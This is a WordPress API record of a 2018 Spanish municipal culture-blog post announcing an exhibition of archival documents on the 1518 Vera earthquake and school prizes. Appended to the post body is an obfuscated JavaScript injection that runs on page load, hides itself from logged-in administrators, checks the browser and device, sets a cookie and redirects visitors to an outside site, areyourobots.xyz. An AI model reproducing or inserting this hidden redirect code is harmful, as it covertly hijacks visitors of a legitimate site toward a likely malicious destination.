{"id":3692,"date":"2018-10-24T11:57:13","date_gmt":"2018-10-24T11:57:13","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=3692"},"modified":"2018-10-24T11:57:13","modified_gmt":"2018-10-24T11:57:13","slug":"exposicion-de-documentos-sobre-el-terremoto-de-vera","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2018\/10\/24\/exposicion-de-documentos-sobre-el-terremoto-de-vera\/","title":{"rendered":"EXPOSICI\u00d3N DE DOCUMENTOS SOBRE EL TERREMOTO DE VERA"},"content":{"rendered":"<p>El viernes 26 de octubre se inaugura la exposici\u00f3n de documentos de Archivo que tratan sobre el terremoto de Vera de 9 de noviembre de 1518. Lugar: Convento de la Victoria de Vera. Hora: 19:00.<\/p>\n<p><!--more--><\/p>\n<p>Posteriormente se entregar\u00e1n los premios de relato y dibujo sobre el Terremoto a los centros educativos de Vera.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/10\/AAFF-Cartel-expo-documentos-reduc.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-3693\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/10\/AAFF-Cartel-expo-documentos-reduc-212x300.jpg\" alt=\"\" width=\"212\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/10\/AAFF-Cartel-expo-documentos-reduc-212x300.jpg 212w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/10\/AAFF-Cartel-expo-documentos-reduc-768x1086.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/10\/AAFF-Cartel-expo-documentos-reduc-724x1024.jpg 724w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/10\/AAFF-Cartel-expo-documentos-reduc.jpg 1181w\" sizes=\"(max-width: 212px) 100vw, 212px\" \/><\/a><\/p>\n<p align=\"center\"><span style=\"font-family: Andalus, serif\"><span style=\"font-size: medium\"><b>El motivo principal de esta exposici\u00f3n de documentos hist\u00f3ricos seleccionados custodiados en la Biblioteca Nacional de Espa\u00f1a y en el Archivo Municipal de Vera sobre el terremoto que destruy\u00f3 la ciudad de la Vera vieja, la del Cerro del Esp\u00edritu Santo, es el de rendir un emotivo homenaje a los 150 veratenses fallecidos por el temblor s\u00edsmico que se sufri\u00f3 el 9 de noviembre del a\u00f1o 1518 en esta Comarca y en la Tierra de Vera y el de difundir a todos los interesados las fuentes documentales por las cuales sabemos c\u00f3mo se sucedieron los hechos hace ya cinco siglos.<\/b><\/span><\/span><\/p>\n<p align=\"center\"><span style=\"font-family: Andalus, serif\"><span style=\"font-size: medium\"><b>Todos sabemos que los Archivos Hist\u00f3ricos son centros en los que, por medio de la organizaci\u00f3n de sus fondos, se trata de clasificar, poner a disposici\u00f3n de los interesados y divulgar por medio de la investigaci\u00f3n, las exposiciones, etc., la informaci\u00f3n de los documentos que conservan. De la consulta y estudio de esos documentos por parte de los historiadores se escriben los libros de Historia que todos conocemos y que nos ayudan a entender el pasado. Sin esos documentos ser\u00eda imposible saber qu\u00e9 ocurri\u00f3, por lo que su importancia en la historia de las naciones nos lleva a considerarlos como parte fundamental y valiosa del Patrimonio Hist\u00f3rico de nuestros pa\u00edses.<\/b><\/span><\/span><\/p>\n<p align=\"center\"><span style=\"font-family: Andalus, serif\"><span style=\"font-size: medium\"><b>La Comisi\u00f3n del V Centenario del Terremoto de Vera, entre otras muchas actividades, ha planificado esta exposici\u00f3n habiendo sido necesario previamente conseguir las copias de los documentos en los que se hablaba sobre este cap\u00edtulo de la Ciudad, del fin de la fortaleza que los musulmanes ocuparon durante cinco siglos y que supuso un basti\u00f3n estrat\u00e9gico en la frontera frente a los enemigos y el inicio de la construcci\u00f3n de la Vera nueva, la que hoy habitamos gracias a la funci\u00f3n militar que valientemente asumi\u00f3 desde las capitulaciones musulmanas y la toma de las tropas cristianas, un 10 de junio de 1488 (festividad de La Virgen de las Angustias, patrona de Vera junto a san Cleof\u00e1s). <\/b><\/span><\/span><\/p>\n<p align=\"center\"><span style=\"font-family: Andalus, serif\"><span style=\"font-size: medium\"><b>De esta manera, los visitantes tienen ante s\u00ed los testimonios escritos en gran formato de esa \u00e9poca y sus transcripciones; nos informan de primera mano de la sucesi\u00f3n de hechos, a trav\u00e9s de los documentos m\u00e1s significativos de esos primeros a\u00f1os cristianos; de lo que ocurri\u00f3 durante esa tr\u00e1gica noche de noviembre y de los informes que demuestran c\u00f3mo se reedific\u00f3 la nueva Ciudad de Vera. La Muy Noble y Muy Leal Ciudad de Vera.<\/b><\/span><\/span><\/p>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El viernes 26 de octubre se inaugura la exposici\u00f3n de documentos de Archivo que tratan sobre el terremoto de Vera de 9 de noviembre de 1518. Lugar: Convento de la Victoria de Vera. Hora: 19:00.<\/p>\n","protected":false},"author":7,"featured_media":3693,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,109],"tags":[283],"class_list":["post-3692","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-archivo","category-historia","tag-comision-del-v-centenario-del-terremoto-de-vera"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3692","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=3692"}],"version-history":[{"count":1,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3692\/revisions"}],"predecessor-version":[{"id":3694,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3692\/revisions\/3694"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/3693"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=3692"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=3692"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=3692"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}